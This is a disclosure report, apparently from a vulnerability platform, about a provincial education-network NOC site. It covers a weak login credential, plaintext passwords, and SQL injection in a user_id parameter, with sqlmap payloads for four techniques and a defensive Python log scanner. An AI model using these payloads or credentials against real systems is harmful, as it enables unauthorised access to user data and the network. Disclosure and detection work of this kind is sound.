2015-12-20: Details sent to the vendor, awaiting vendor handling
2015-12-25: Vendor has confirmed; details disclosed to the vendor only
2016-01-04: Details disclosed to core white hats and experts in the relevant field
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public
A certain province; please have the third-party partner organization, CCERT (the education-network emergency response team), contact them for handling.
Weak password:
http://**.**.**.**/noc/user_login.php  account: mk  password: aaaaaa
Passwords stored in plaintext on the page: after logging in, viewing other users' information under User Management shows their passwords present in the page source.
SQL injection + plaintext passwords: the user_id parameter is not filtered strictly.
GET /noc/usermodi.php?user_lx=show&user_id=27 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http://**.**.**.**/noc/user.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: qhnu_noc[user]=mk; qhnu_noc[access]=2; hkj=ipbjf97ht6k1ppa42c0e92vb90; JSESSIONID=4C33615E92A6FB59CE0A27B6D0A674C9; userNameForAutomaticSignin=aaaaaaaaa; domainNameForAutomaticSignin=NULL; isADAuth=false; passwordForAutomaticSignin=aaaaaaaaaaa; signInAutomatically=true; flashversionInstalled=19.0.0
Payload (sqlmap output):
Parameter: user_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user_lx=show&user_id=27 RLIKE (SELECT (CASE WHEN (2900=2900) THEN 27 ELSE 0x28 END))
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user_lx=show&user_id=27 AND (SELECT 7032 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(SELECT (ELT(7032=7032,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user_lx=show&user_id=27 AND (SELECT * FROM (SELECT(SLEEP(5)))vJfV)
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: user_lx=show&user_id=-6284 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176786b71,0x6c48457778626256756a516f736c5a5966694a4458776e5a49544b5049486a74634946674e7a6354,0x71706b7071),NULL,NULL-- -
    Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -
IP address ranges of each school:
Line and access-unit telephone numbers:
IP address usage:
IP address management:
From the above information the network topology of the province's education network can be learned, which lays good groundwork for subsequent penetration. Shouldn't this be taken seriously?
Fix it && add filtering.
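As an added example (not code from the original report), a Python scanner that covers the detection side of this finding: it runs over constructed web-server access-log lines, flags requests to usermodi.php whose user_id carries any of the four sqlmap techniques listed above, and includes the integer check that the "filter" part of the fix requires. The IPs, timestamps and log lines are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the report): one benign request to
# /noc/usermodi.php, then one request per technique in the sqlmap output above.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Dec/2015:10:01:02 +0800] "GET /noc/usermodi.php?user_lx=show&user_id=27 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [20/Dec/2015:10:01:05 +0800] "GET /noc/usermodi.php?user_lx=show&user_id=27%20RLIKE%20(SELECT%20(CASE%20WHEN%20(2900=2900)%20THEN%2027%20ELSE%200x28%20END)) HTTP/1.1" 200 4120',
    '10.0.0.9 - - [20/Dec/2015:10:01:09 +0800] "GET /noc/usermodi.php?user_lx=show&user_id=27%20AND%20(SELECT%207032%20FROM(SELECT%20COUNT(*),CONCAT(0x7176786b71,(SELECT%20(ELT(7032=7032,1))),0x71706b7071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 812',
    '10.0.0.9 - - [20/Dec/2015:10:01:14 +0800] "GET /noc/usermodi.php?user_lx=show&user_id=27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vJfV) HTTP/1.1" 200 4120',
    '10.0.0.9 - - [20/Dec/2015:10:01:21 +0800] "GET /noc/usermodi.php?user_lx=show&user_id=-6284%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 5310',
]

# Common-log-format prefix: client IP, then the request line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# One signature per technique sqlmap reported; checked in this order.
TECHNIQUES = [
    ("boolean-blind", re.compile(r"\bRLIKE\b", re.I)),
    ("error-based", re.compile(r"INFORMATION_SCHEMA|FLOOR\(RAND\(", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("union", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
]


def is_valid_user_id(value: str) -> bool:
    """The 'filter' half of the fix: user_id must be a plain positive integer.
    Anything else should be rejected before it reaches the SQL query."""
    return value.isdigit() and int(value) > 0


def scan(lines):
    """Return (ip, technique, user_id) for every request whose user_id is not a
    plain integer; technique is 'unknown' when no known signature matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)  # percent-decodes values
        if "user_id" not in query:
            continue
        user_id = query["user_id"][0]
        if is_valid_user_id(user_id):
            continue
        technique = next((name for name, rx in TECHNIQUES if rx.search(user_id)), "unknown")
        hits.append((m["ip"], technique, user_id))
    return hits
```

In a real deployment the integer check belongs in usermodi.php itself, in front of the query; the log scan only tells you after the fact who sent what.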
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-12-25 16:12
Notified; handling in progress
None yet